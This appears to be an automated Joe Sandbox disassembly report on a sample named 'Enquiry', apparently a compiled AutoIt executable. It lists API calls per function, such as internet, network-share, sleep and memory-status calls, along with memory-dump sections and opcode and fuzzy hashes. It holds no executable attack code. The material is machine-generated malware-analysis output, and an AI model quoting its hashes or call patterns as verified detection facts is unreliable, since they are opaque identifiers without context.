                            APIs
                            • GetDesktopWindow.USER32 ref: 00472BB2
                            • GetDC.USER32(00000000), ref: 00472BBB
                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                            • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                            • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                            • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                            • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                            APIs
                            • __getptd_noexit.LIBCMT ref: 00415150
                              • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                              • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                              • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                              • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                              • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                            • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                            • __freeptd.LIBCMT ref: 0041516B
                            • ExitThread.KERNEL32 ref: 00415173
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                            • String ID:
                            • API String ID: 1454798553-0
                            • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                            • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                            • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                            • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _strncmp
                            • String ID: Q\E
                            • API String ID: 909875538-2189900498
                            • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                            • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                            • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                            • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                            APIs
                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                            • String ID: AutoIt3GUI$Container
                            • API String ID: 2652923123-3941886329
                            • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                            • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                            • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                            • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove_strncmp
                            • String ID: U$\
                            • API String ID: 2666721431-100911408
                            • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                            • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                            • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                            • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                            APIs
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • __wcsnicmp.LIBCMT ref: 00467288
                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                            • String ID: LPT
                            • API String ID: 3035604524-1350329615
                            • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                            • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                            • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                            • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: \$h
                            • API String ID: 4104443479-677774858
                            • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                            • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                            • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                            • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memcmp
                            • String ID: &
                            • API String ID: 2931989736-1010288
                            • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                            • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                            • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                            • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: \
                            • API String ID: 4104443479-2967466578
                            • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                            • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                            • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                            • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                            APIs
                            • _wcslen.LIBCMT ref: 00466825
                            • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CrackInternet_wcslen
                            • String ID: |
                            • API String ID: 596671847-2343686810
                            • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                            • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                            • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                            • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                            APIs
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: '
                            • API String ID: 3850602802-1997036262
                            • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                            • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                            • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                            • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                            APIs
                            • _strlen.LIBCMT ref: 0040F858
                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                            • _sprintf.LIBCMT ref: 0040F9AE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove$_sprintf_strlen
                            • String ID: %02X
                            • API String ID: 1921645428-436463671
                            • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                            • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                            • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                            • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                            APIs
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: Combobox
                            • API String ID: 3850602802-2096851135
                            • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                            • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                            • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                            • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                            APIs
                            • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: LengthMessageSendTextWindow
                            • String ID: edit
                            • API String ID: 2978978980-2167791130
                            • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                            • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                            • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                            • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00476CB0
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: GlobalMemorySleepStatus
                            • String ID: @
                            • API String ID: 2783356886-2766056989
                            • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                            • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                            • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                            • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: htonsinet_addr
                            • String ID: 255.255.255.255
                            • API String ID: 3832099526-2422070025
                            • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                            • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                            • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                            • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                            APIs
                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: InternetOpen
                            • String ID: <local>
                            • API String ID: 2038078732-4266983199
                            • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                            • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
